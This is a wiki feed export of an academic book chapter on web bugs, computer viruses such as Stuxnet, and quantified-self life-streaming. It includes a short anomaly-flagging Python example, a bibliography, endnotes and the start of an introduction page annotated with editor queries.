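# standard deviation) and flag large deviations. Data and threshold
# are invented for illustration.
import statistics

history = [7.2, 6.8, 7.5, 7.0, 6.9, 7.3]   # e.g. nightly hours of sleep
mean = statistics.mean(history)
sd = statistics.stdev(history)

def flag(value, threshold=2.0):
    z = (value - mean) / sd                 # distance from baseline in SDs
    return 'unusual' if abs(z) >= threshold else 'normal'

print(flag(4.5))   # far below baseline: 'unusual'
print(flag(7.1))   # within baseline: 'normal'
&amp;lt;/pre&amp;gt; &lt;br /&gt;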
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, through a stabilised web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real-time whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams, albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: both their passive quality – under the surface, relatively benign and silent – and the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard: what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, centrifuge layout and enrichment process (see [http://www.president.ir/en/9172 http://www.president.ir/en/9172]; Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing on the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4672</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4672"/>
		<updated>2012-03-19T10:52:56Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/ Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet (Kitchin, 2011: 945).&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world (Deuze, Blank, and Speers, 2012).&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. 